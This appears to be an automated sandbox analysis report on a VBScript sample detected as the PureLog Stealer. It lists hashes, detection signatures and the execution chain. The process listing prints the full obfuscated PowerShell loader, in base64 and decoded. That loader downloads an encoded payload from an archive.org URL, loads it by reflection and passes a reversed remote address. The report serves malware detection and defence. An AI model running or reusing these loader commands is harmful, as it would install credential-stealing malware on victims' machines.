Edit tour
Windows
Analysis Report
0BO4n723Q8.vbs
Overview
General Information
Sample name: | 0BO4n723Q8.vbsrenamed because original name is a hash value |
Original sample name: | 35d62ef87119b12931f40ed80b1cf35e8b32097027f77f96d27351fbf9d4501b.vbs |
Analysis ID: | 1523824 |
MD5: | 19f9fc1579433299ad398e80b01f4137 |
SHA1: | f1ebb5f2428d32d75b5c76da93ae9f776f95303a |
SHA256: | 35d62ef87119b12931f40ed80b1cf35e8b32097027f77f96d27351fbf9d4501b |
Tags: | BlindEaglevbsuser-JAMESWT_MHT |
Infos: | |
Detection
PureLog Stealer
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected PureLog Stealer
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 7500 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\0BO4n 723Q8.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 7584 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' JiAoICRlTn Y6Q29tU3Bl Q1s0LDI0LD I1XS1qb2lu JycpICgoJz c5JysnZHVy bCA9JysnIE txamh0Jysn dHBzJysnOi 8vaWE2MDAx MDAuJysndX MuJysnYXJj aGl2ZS5vcm cvJysnMjQv aXRlbXMvZG UnKyd0YWgt bm90ZS12L0 RlJysndGFo TicrJ290ZS crJ1YudHh0 S3FqJysnOz cnKyc5ZGJh c2U2NENvbn RlbicrJ3Qg JysnPScrJy AoTmV3LU9i amVjdCBTeX N0ZW0uTmV0 LlcnKydlYi crJ0NsaWUn KydudCkuRG 93bmxvYScr J2RTdHJpbm coNzlkdScr J3JsKTs3Jy snOWRiaW5h JysncnknKy dDb250Jysn ZW50ID0nKy cgJysnW1N5 Jysnc3RlbS 5DbycrJ24n Kyd2ZXJ0Jy snXTo6Jysn RnJvbUJhc2 UnKyc2Jysn NFN0cmluZy gnKyc3Jysn OWRiYXNlNj RDb250ZW50 KTs3JysnOW QnKydhc3Nl bWInKydseS A9IFtSJysn ZWYnKydsJy snZWN0aScr J29uLkEnKy dzJysnc2Vt Ymx5XTo6TG 9hZCg3OWRi aW5hcicrJ3 lDbycrJ250 ZW50KScrJz snKyc3OScr J2R0eXBlID 0nKycgNzlk JysnYXNzZW 1ibCcrJ3ku R2V0VCcrJ3 lwZShLJysn cWonKydSJy sndW5QRScr Jy5Ib21lJy snS3FqKTsn Kyc3OWRtJy snZXRob2Qg PSAnKyc3OW R0eScrJ3An KydlLkcnKy dldE1ldGhv JysnZCgnKy dLcScrJ2on KydWQUlLcS crJ2opOzc5 ZG1ldGhvZC 5JbnZvJysn a2UoNzlkJy snbnUnKyds bCwnKycgW2 9iamVjJysn dFtdXScrJ0 AoS3FqJysn dHgnKyd0Lk hUT01SLzAz MS84NDIuOD QxLjI3MS43 MDEvLycrJz pwdHRoSycr J3FqICwgS3 FqJysnZGUn KydzYXRpdi crJ2Fkb0tx aiAsIEtxam Rlc2F0aXZh ZCcrJ29LcW onKycgLCBL cWpkZScrJ3 NhdGl2YWRv S3FqLEtxal JlZ0EnKydz bUtxaicrJy wnKydLJysn cWpLcScrJ2 onKycpKScp LlJFUGxBY2 UoKFtjaGFy XTU1K1tjaG FyXTU3K1tj aGFyXTEwMC ksJyQnKS5S RVBsQWNlKC hbY2hhcl03 NStbY2hhcl 0xMTMrW2No YXJdMTA2KS xbc3RySW5n XVtjaGFyXT M5KSAp';$O Wjuxd = [s ystem.Text .encoding] ::UTF8.Get String([sy stem.Conve rt]::Fromb ase64Strin g($codigo) );powershe ll.exe -wi ndowstyle hidden -ex ecutionpol icy bypass -NoProfil e -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7592 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7744 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "& ( $ eNv:ComSpe C[4,24,25] -join'') ( ('79'+'dur l ='+' Kqj ht'+'tps'+ '://ia6001 00.'+'us.' +'archive. org/'+'24/ items/de'+ 'tah-note- v/De'+'tah N'+'ote'+' V.txtKqj'+ ';7'+'9dba se64Conten '+'t '+'=' +' (New-Ob ject Syste m.Net.W'+' eb'+'Clie' +'nt).Down loa'+'dStr ing(79du'+ 'rl);7'+'9 dbina'+'ry '+'Cont'+' ent ='+' ' +'[Sy'+'st em.Co'+'n' +'vert'+'] ::'+'FromB ase'+'6'+' 4String('+ '7'+'9dbas e64Content );7'+'9d'+ 'assemb'+' ly = [R'+' ef'+'l'+'e cti'+'on.A '+'s'+'sem bly]::Load (79dbinar' +'yCo'+'nt ent)'+';'+ '79'+'dtyp e ='+' 79d '+'assembl '+'y.GetT' +'ype(K'+' qj'+'R'+'u nPE'+'.Hom e'+'Kqj);' +'79dm'+'e thod = '+' 79dty'+'p' +'e.G'+'et Metho'+'d( '+'Kq'+'j' +'VAIKq'+' j);79dmeth od.Invo'+' ke(79d'+'n u'+'ll,'+' [objec'+' t[]]'+'@(K qj'+'tx'+' t.HTOMR/03 1/842.841. 271.701//' +':ptthK'+ 'qj , Kqj' +'de'+'sat iv'+'adoKq j , Kqjdes ativad'+'o Kqj'+' , K qjde'+'sat ivadoKqj,K qjRegA'+'s mKqj'+','+ 'K'+'qjKq' +'j'+'))') .REPlAce(( [char]55+[ char]57+[c har]100),' $').REPlAc e(([char]7 5+[char]11 3+[char]10 6),[strIng ][char]39) )" MD5: 04029E121A0CFA5991749937DD22A1D9)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| |
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |